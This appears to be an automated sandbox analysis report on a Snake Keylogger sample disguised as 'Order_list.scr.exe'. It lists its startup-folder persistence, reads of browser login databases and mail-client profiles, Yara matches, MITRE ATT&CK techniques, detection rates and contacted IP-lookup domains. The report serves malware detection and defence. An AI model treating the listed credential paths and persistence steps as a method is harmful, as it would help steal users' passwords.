Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Order_list.scr.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 0.2.Order_list.scr.exe.3719840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	12 Registry Run Keys / Startup Folder	11 Process Injection	3 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Order_list.scr.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
Order_list.scr.exe	100%	Avira	HEUR/AGEN.1309847
Order_list.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	100%	Avira	HEUR/AGEN.1309847
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label
http://checkip.dyndns.orgX	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlit-itt	0%	Avira URL Cloud	safe
http://crl.microu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.64.1	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
198.187.3.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000001.00000002.1709053274.0000000007410000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.4.dr	false		high
http://www.fontbureau.com/designers	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.4.dr	false		high
http://www.founder.com.cn/cn/cThe	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.4.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Order_list.scr.exe, 00000000.00000002.4164055265.0000000003732000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000339D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false		high
https://reallyfreegeoip.org/xml/	Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000004.00000002.3324839942.0000023A6F000000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ascendercorp.com/typedesigners.htmlit-itt	Order_list.scr.exe, 00000000.00000002.4175150990.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003379000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027E5000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false		high
http://www.jiyu-kobo.co.jp/	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microu	powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.orgX	00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589903
Start date and time:	2025-01-13 10:11:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
